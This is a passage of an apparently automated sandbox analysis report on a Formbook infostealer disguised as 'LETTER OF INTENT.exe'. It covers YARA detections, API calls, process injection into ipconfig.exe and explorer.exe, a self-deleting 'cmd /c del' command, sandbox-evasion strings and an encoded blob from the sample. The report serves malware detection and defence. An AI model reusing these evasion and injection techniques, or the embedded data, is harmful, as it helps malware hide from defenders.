            Source: 1.0.LETTER OF INTENT.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.0.LETTER OF INTENT.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02E9B150 appears 45 times
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_004185D0 NtCreateFile,1_2_004185D0
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_00418680 NtReadFile,1_2_00418680
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_00418700 NtClose,1_2_00418700
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_004187B0 NtAllocateVirtualMemory,1_2_004187B0
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_004185CF NtCreateFile,1_2_004185CF
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041867A NtReadFile,1_2_0041867A
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_004187AA NtAllocateVirtualMemory,1_2_004187AA
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9A50 NtCreateFile,LdrInitializeThunk,15_2_02ED9A50
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9860 NtQuerySystemInformation,LdrInitializeThunk,15_2_02ED9860
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9840 NtDelayExecution,LdrInitializeThunk,15_2_02ED9840
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED99A0 NtCreateSection,LdrInitializeThunk,15_2_02ED99A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_02ED9910
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED96E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_02ED96E0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED96D0 NtCreateKey,LdrInitializeThunk,15_2_02ED96D0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9FE0 NtCreateMutant,LdrInitializeThunk,15_2_02ED9FE0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9780 NtMapViewOfSection,LdrInitializeThunk,15_2_02ED9780
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9710 NtQueryInformationToken,LdrInitializeThunk,15_2_02ED9710
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED95D0 NtClose,LdrInitializeThunk,15_2_02ED95D0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9540 NtReadFile,LdrInitializeThunk,15_2_02ED9540
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9A80 NtOpenDirectoryObject,15_2_02ED9A80
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9A20 NtResumeThread,15_2_02ED9A20
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9A00 NtProtectVirtualMemory,15_2_02ED9A00
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9A10 NtQuerySection,15_2_02ED9A10
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EDA3B0 NtGetContextThread,15_2_02EDA3B0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9B00 NtSetValueKey,15_2_02ED9B00
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED98F0 NtReadVirtualMemory,15_2_02ED98F0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED98A0 NtWriteVirtualMemory,15_2_02ED98A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EDB040 NtSuspendThread,15_2_02EDB040
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9820 NtEnumerateKey,15_2_02ED9820
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED99D0 NtCreateProcessEx,15_2_02ED99D0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9950 NtQueueApcThread,15_2_02ED9950
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9660 NtAllocateVirtualMemory,15_2_02ED9660
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9670 NtQueryInformationProcess,15_2_02ED9670
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9650 NtQueryValueKey,15_2_02ED9650
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9610 NtEnumerateValueKey,15_2_02ED9610
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED97A0 NtUnmapViewOfSection,15_2_02ED97A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9760 NtOpenProcess,15_2_02ED9760
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EDA770 NtOpenThread,15_2_02EDA770
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9770 NtSetInformationFile,15_2_02ED9770
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9730 NtQueryVirtualMemory,15_2_02ED9730
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EDA710 NtOpenProcessToken,15_2_02EDA710
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED95F0 NtQueryInformationFile,15_2_02ED95F0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9560 NtWriteFile,15_2_02ED9560
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9520 NtWaitForSingleObject,15_2_02ED9520
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EDAD30 NtSetContextThread,15_2_02EDAD30
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A18680 NtReadFile,15_2_02A18680
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A18700 NtClose,15_2_02A18700
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A185D0 NtCreateFile,15_2_02A185D0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A1867A NtReadFile,15_2_02A1867A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A185CF NtCreateFile,15_2_02A185CF
            Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 98%
            Source: LETTER OF INTENT.exe, 00000000.00000002.249251957.0000000006110000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpaceChemSolver.dll@ vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000000.00000002.245113869.000000000108E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameConsoleSpecial.exeZ vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000000.00000002.247039012.00000000043F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000000.00000002.245528197.0000000001CA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSpaceChemSolver.dll@ vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000001.00000002.309332574.000000000142F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000001.00000002.308765964.000000000129F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000001.00000000.242878191.000000000072E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameConsoleSpecial.exeZ vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000001.00000002.307970163.0000000001157000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000001.00000002.307642624.0000000000D5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000001.00000002.307730478.0000000000D6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: LETTER OF INTENT.exeVirustotal: Detection: 25%
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\LETTER OF INTENT.exe "C:\Users\user\Desktop\LETTER OF INTENT.exe"
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess created: C:\Users\user\Desktop\LETTER OF INTENT.exe C:\Users\user\Desktop\LETTER OF INTENT.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\LETTER OF INTENT.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
            Source: unknownProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
            Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{660b90c8-73a9-4b58-8cae-355b7f55341b}\InProcServer32
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LETTER OF INTENT.exe.log
            Source: classification engineClassification label: mal100.troj.evad.winEXE@9/2@0/1
            Source: C:\Windows\explorer.exe File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: LETTER OF INTENT.exe, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.cs Base64 encoded string
            Source: 0.0.LETTER OF INTENT.exe.fd0000.0.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.cs Base64 encoded string
            Source: 1.0.LETTER OF INTENT.exe.670000.9.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.cs Base64 encoded string
            Source: 1.0.LETTER OF INTENT.exe.670000.1.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.cs Base64 encoded string
IUAAMAQIEMAAAAAAAAABAQBIE4AAACVXN4UAAAAKEMAAAAAAAAAHAQBIE4AAACVXFAUQAAAKQQUCUAAABIGREAZIFMAAACRIFQAAACQKAAEBRVQMBAD74AQW7YARGBARAQW24BQTAUVQAEIFFIABGMACAAUAAAAAA4AAAEIAANZAGAAAOAUCYAAABIUC2AAABJZS4AAABIFAMATPF4AAACTUCAAAAAILFMAAOKS6AIUBGAAABIAAAAQDPUAQAAAEAICH2AQAAACCUEZQAMAI2AAAAAEAAAARAANAH7QBBIDCYDAAOIXQAADQOMYAAAAKPIBRN7QBBMDSYFYAAJ5QCAAAAQBHWAQAAACBOWLTBMAAABQMFNLROA76AEGQSLAXAABHWAIAAACAE6YCAAAAIF2YOMFQAAAGBQVTQGID7YARGBARAQWBOAACPMAQAAAEC5MQE6YCAAAAI4YLAAAAMDBLC4AAE6YBAAAAIF2YAJ5QEAAAARZQWAAAAYGCWAAIFIAAAAATGABQA2QAAAAASAAACEAAICQGFQYQAA33AEAAABADPMBAAAAELEBHWAQAAACFQA33AEAAABADPMBAAAAELABHWAIAAACFS4YLAAAAMCZLGEAAG6YBAAAAIA33AIAAABCYAJ5QEAAAARMQG6YCAAAAIA33AEAAABCZAJ5QCAAAARMHGCYAAADAWKYAA4VAAAATGACAANAAAAAAUAAACEAAE6YBAAAAICQCPMBAAAAEBMBXWAIAAACAYA33AIAAABANAYEFSBQILFNAOCKZA4EVSWSYNQJQIKYACECCUEZQAMAK6AAAAAFQAAARAABHWAIAAACAG6YBAAAAJ7QBC37ACCQGFQ3AAAT3AEAAABADPMAQAAAEC5M74AILA4WAKAAZBQVX2AT3AEAAABAXLABXWAIAAACP4AINBEWAKAAYBQVWIABLJ4BHWAQAAACAG6YCAAAAJ7QBC37ACEYECECCYOAAAJ5QEAAAAQBXWAQAAACBOWH6AEJQKEIFFQCQAFQMFMXAE6YCAAAAIF2YAN5QEAAAAT7ACEYGCEDCYBIAC4GCWEYAOKHQAADQAMBCQMIAAAFHGMAAAAFHUCBKAAJTAAQAHEAAAAAMAAABCAADOUBQAAA
            Source: 1.0.LETTER OF INTENT.exe.670000.0.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.csBase64 encoded string: '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
            Source: 1.0.LETTER OF INTENT.exe.670000.7.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.csBase64 encoded string: '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
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:120:WilError_01
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeMutant created: \Sessions\1\BaseNamedObjects\xkJEJVLgvtGXaJ
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\explorer.exe
            Source: unknownProcess created: C:\Windows\explorer.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: LETTER OF INTENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: LETTER OF INTENT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: ipconfig.pdb source: LETTER OF INTENT.exe, 00000001.00000002.307642624.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, LETTER OF INTENT.exe, 00000001.00000002.307957753.0000000001150000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: ipconfig.pdbGCTL source: LETTER OF INTENT.exe, 00000001.00000002.307642624.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, LETTER OF INTENT.exe, 00000001.00000002.307957753.0000000001150000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: LETTER OF INTENT.exe, 00000001.00000002.308765964.000000000129F000.00000040.00000800.00020000.00000000.sdmp, LETTER OF INTENT.exe, 00000001.00000002.307985320.0000000001180000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: LETTER OF INTENT.exe, 00000001.00000002.308765964.000000000129F000.00000040.00000800.00020000.00000000.sdmp, LETTER OF INTENT.exe, 00000001.00000002.307985320.0000000001180000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_00FD4CA2 push esp; iretd 0_2_00FD4CA3
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_01924FD0 push E8000007h; ret 0_2_01925009
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_01924FEB push E8000007h; ret 0_2_01925009
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_0192500B push E8000007h; ret 0_2_01925009
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_061C4FEA push es; ret 0_2_061C5010
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_061C3CCD push ss; iretd 0_2_061C3CD3
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_061C5561 push es; ret 0_2_061C5594
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_061C4A23 push ss; iretd 0_2_061C4A24
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041B87C push eax; ret 1_2_0041B882
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041B812 push eax; ret 1_2_0041B818
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041B81B push eax; ret 1_2_0041B882
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_00406890 push ebp; iretd 1_2_00406893
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0040F95C push esi; ret 1_2_0040F95F
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0040696E pushad ; iretd 1_2_0040698D
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041613A pushfd ; retf 1_2_0041613C
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041CCDC push FFFFFFEDh; ret 1_2_0041CCDE
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041B7C5 push eax; ret 1_2_0041B818
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_00674CA2 push esp; iretd 1_2_00674CA3
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EED0D1 push ecx; ret 15_2_02EED0E4
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A06890 push ebp; iretd 15_2_02A06893
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A1B812 push eax; ret 15_2_02A1B818
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A1B81B push eax; ret 15_2_02A1B882
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A1B87C push eax; ret 15_2_02A1B882
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A1613A pushfd ; retf 15_2_02A1613C
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A0696E pushad ; iretd 15_2_02A0698D
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A0F95C push esi; ret 15_2_02A0F95F
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A1B7C5 push eax; ret 15_2_02A1B818
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A1CCDC push FFFFFFEDh; ret 15_2_02A1CCDE
            Source: initial sampleStatic PE information: section name: .text entropy: 7.64198906691

            Persistence and Installation Behavior

            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: /c del "C:\Users\user\Desktop\LETTER OF INTENT.exe"
            Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara matchFile source: 0.2.LETTER OF INTENT.exe.342a3e4.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: LETTER OF INTENT.exe PID: 6272, type: MEMORYSTR
            Source: LETTER OF INTENT.exe, 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
